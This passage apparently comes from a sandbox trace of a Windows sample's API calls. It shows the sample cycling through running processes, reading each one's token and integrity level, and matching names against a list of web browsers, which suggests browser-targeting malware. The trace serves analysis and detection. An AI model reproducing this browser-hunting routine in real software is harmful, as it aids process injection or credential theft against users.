1")) returned 1 [0462.164] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0462.164] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0462.164] GetLastError () returned 0x7a [0462.164] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0462.164] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0462.164] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0462.164] CloseHandle (hObject=0x3bc) returned 1 [0462.164] CloseHandle (hObject=0x5a4) returned 1 [0462.165] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0462.165] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0462.165] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0462.165] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0462.165] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0462.165] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0462.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0462.165] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0462.165] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0464.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa798) returned 0xc0000004 [0464.170] VirtualAlloc (lpAddress=0x0, dwSize=0xb798, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0464.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb798, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0464.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0464.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0464.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0464.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0464.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0464.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0464.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0464.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0464.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0464.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0464.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0464.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0464.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0464.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0464.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0464.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0464.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0464.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0464.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0464.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0464.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0464.174] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0464.174] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0464.174] GetLastError () returned 0x7a [0464.174] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0464.175] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0464.175] CloseHandle (hObject=0x3bc) returned 1 [0464.175] CloseHandle (hObject=0x5a4) returned 1 [0464.175] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0464.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0464.175] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x378128, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">M") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0464.175] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0464.175] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0464.175] GetLastError () returned 0x7a [0464.176] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0464.176] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0464.176] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0464.176] CloseHandle (hObject=0x3bc) returned 1 [0464.176] CloseHandle (hObject=0x5a4) returned 1 [0464.177] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0464.177] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0464.177] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0464.177] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0464.177] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0464.177] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0464.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0464.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0464.177] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0464.178] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0464.178] GetLastError () returned 0x7a [0464.178] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0464.178] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0464.178] CloseHandle (hObject=0x3bc) returned 1 [0464.178] CloseHandle (hObject=0x5a4) returned 1 [0464.178] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0464.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0464.178] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375d60, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">N") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0464.179] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0464.179] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0464.179] GetLastError () returned 0x7a [0464.179] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0464.179] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0464.179] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0464.179] CloseHandle (hObject=0x3bc) returned 1 [0464.179] CloseHandle (hObject=0x5a4) returned 1 [0464.180] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0464.180] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0464.180] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0464.180] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0464.180] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0464.180] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0464.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0464.180] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0464.181] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0464.181] GetLastError () returned 0x7a [0464.181] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0464.181] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0464.181] CloseHandle (hObject=0x3bc) returned 1 [0464.181] CloseHandle (hObject=0x5a4) returned 1 [0464.181] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0464.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0464.181] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376520, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">O") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0464.182] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0464.182] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0464.182] GetLastError () returned 0x7a [0464.182] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0464.182] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0464.182] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0464.182] CloseHandle (hObject=0x3bc) returned 1 [0464.182] CloseHandle (hObject=0x5a4) returned 1 [0464.183] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0464.183] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0464.183] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0464.183] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0464.183] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0464.183] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0464.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0464.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0464.184] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0464.184] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0464.184] GetLastError () returned 0x7a [0464.184] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0464.184] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0464.184] CloseHandle (hObject=0x3bc) returned 1 [0464.184] CloseHandle (hObject=0x5a4) returned 1 [0464.184] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0464.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0464.185] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376b68, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">P") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0464.185] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0464.185] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0464.185] GetLastError () returned 0x7a [0464.185] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0464.185] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0464.185] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0464.185] CloseHandle (hObject=0x3bc) returned 1 [0464.185] CloseHandle (hObject=0x5a4) returned 1 [0464.186] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0464.186] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0464.186] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0464.186] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0464.186] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0464.186] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0464.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0464.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0464.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0464.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0464.187] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0464.187] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0464.187] GetLastError () returned 0x7a [0464.187] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0464.187] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0464.187] CloseHandle (hObject=0x3bc) returned 1 [0464.187] CloseHandle (hObject=0x5a4) returned 1 [0464.188] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0464.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0464.188] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376f10, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">Q") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0464.188] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0464.188] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0464.188] GetLastError () returned 0x7a [0464.188] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0464.188] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0464.188] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0464.189] CloseHandle (hObject=0x3bc) returned 1 [0464.189] CloseHandle (hObject=0x5a4) returned 1 [0464.189] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0464.189] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0464.189] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0464.190] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0464.190] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0464.190] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0464.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0464.190] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0464.191] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0466.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa798) returned 0xc0000004 [0466.198] VirtualAlloc (lpAddress=0x0, dwSize=0xb798, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0466.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb798, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0466.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0466.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0466.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0466.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0466.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0466.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0466.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0466.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0466.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0466.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0466.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0466.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0466.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0466.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0466.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0466.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0466.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0466.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0466.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0466.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0466.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0466.202] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0466.202] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0466.202] GetLastError () returned 0x7a [0466.202] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0466.203] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0466.203] CloseHandle (hObject=0x3bc) returned 1 [0466.203] CloseHandle (hObject=0x5a4) returned 1 [0466.203] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, 